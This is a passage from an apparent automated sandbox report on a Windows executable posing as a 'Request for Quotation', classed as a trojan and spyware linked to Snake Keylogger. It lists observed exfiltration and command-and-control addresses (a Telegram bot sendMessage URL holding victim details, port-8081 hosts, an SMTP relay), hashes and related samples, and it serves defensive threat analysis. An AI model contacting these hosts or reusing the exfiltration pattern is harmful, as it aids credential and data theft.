s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://us2.smtp.mailhostbox.com	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20a	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D67000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D71000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529007
Start date and time:	2024-10-08 15:09:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Request for Quotation Plug Valve.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Request for Quotation Plug Valve.exe

Simulations

Behavior and APIs

Time	Type	Description
09:10:15	API Interceptor	11213750x Sleep call for process: Request for Quotation Plug Valve.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Halkbank_Ekstre_20240508_074644_755730.pdf.exe	Get hash	malicious	AgentTesla	Browse
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	JFFjXW16yR.exe	Get hash	malicious	DarkCloud, PureLog Stealer, zgRAT	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/fOmsJ2bL/download
	NARLOG 08.10.2024.exe	Get hash	malicious	FormBook	Browse	www.thetahostthe.top/9r5x/
	RFQ 245801.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
	74qgPmarBM.exe	Get hash	malicious	Pony	Browse	kuechenundmehr.com/x.htm
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	http://revexhibition.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	revexhibition.pages.dev/favicon.ico
	http://meta.case-page-appeal.eu/community-standard/112225492204863/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	http://www.tkmall-wholesale.com/	Get hash	malicious	Unknown	Browse	www.tkmall-wholesale.com/
	c1#U09a6.exe	Get hash	malicious	Unknown	Browse	winfileshare.com/ticket_line/llb.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
193.122.130.0	tax-invoice-0711.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Bukti-Transfer...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	yvDk2VZluODBu6S.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	tax-invoice-0711.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
s-part-0017.t-0009.t-msedge.net	SgqO4P37cK.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	frik.exe	Get hash	malicious	Xmrig	Browse	13.107.246.45
	Windows Defender.exe	Get hash	malicious	XWorm	Browse	13.107.246.45
	Message_2551600.eml	Get hash	malicious	Unknown	Browse	13.107.246.45
	Oilmax Systems Updated.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	SWIFT 103 202410071519130850 071024.pdf.vbs	Get hash	malicious	Remcos	Browse	13.107.246.45
	Lk9rbSoFqa.exe	Get hash	malicious	SmokeLoader	Browse	13.107.246.45
	po 1105670313_pdf.vbs	Get hash	malicious	Unknown	Browse	13.107.246.45
	20fUAMt5dL.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	13.107.246.45
us2.smtp.mailhostbox.com	Cotizaci#U00f3n P13000996 pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	PAYSLIP.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	SWIFT COPY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Halkbank_Ekstre_20240508_074644_755730.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JFFjXW16yR.exe	Get hash	malicious	DarkCloud, PureLog Stealer, zgRAT	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8
	vD6qU34v9S.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	q6utlq83i0.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	RQ#071024.exe	Get hash	malicious	FormBook	Browse	104.21.11.31
	tax-invoice-0711.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
ORACLE-BMC-31898US	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	tax-invoice-0711.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	152.67.146.77
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	152.67.146.77
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PO.L0009316.Pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	tax-invoice-0711.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	3g833ZIrnA.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	vD6qU34v9S.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	q6utlq83i0.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Halkbank_Ekstre_20240508_074644_755730.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://cdn.prod.website-files.com/66006200351a0e5dfaa727ed/66de69bda1d04790a2e6ba98_54204894406.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://simpleinvoices.io/invoices/gvexd57Lej7	Get hash	malicious	Unknown	Browse	149.154.167.220
	eshkere.bat	Get hash	malicious	Xmrig	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.772258315664058
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Request for Quotation Plug Valve.exe
File size:	776'704 bytes
MD5:	fa1c425a44a073cec7f36210a6d7c3e6
SHA1:	70f4f24c7d4dd4bddfe2fa711f73d8c952be7d5b
SHA256:	181b41addb05b81a4246bc0dfe801d408c7478322cca039b66e91fd0d37c4f47
SHA512:	7ce12e5589dccfe59885f76f86ff32d882ed34d3e021bf9e20d77a4983045d82edf119f28d4d4231ecb656cfbfc497697fef3e56449819eaeada848ca38507db
SSDEEP:	12288:3Zx8GLOzb9CIwIlp9d/BVCVkdIjMHTloR2vC5fJ+OowgFovmE:Jy5b9+c/nC2dc3R2vsJTgF5E
TLSH:	CFF402A8125DD413C95127780972F1B816BA8EDE7802DB81EEDD7CFFBAA6F005C84197
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..g..............0.............>.... ........@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4bf13e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6704B42F [Tue Oct 8 04:25:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
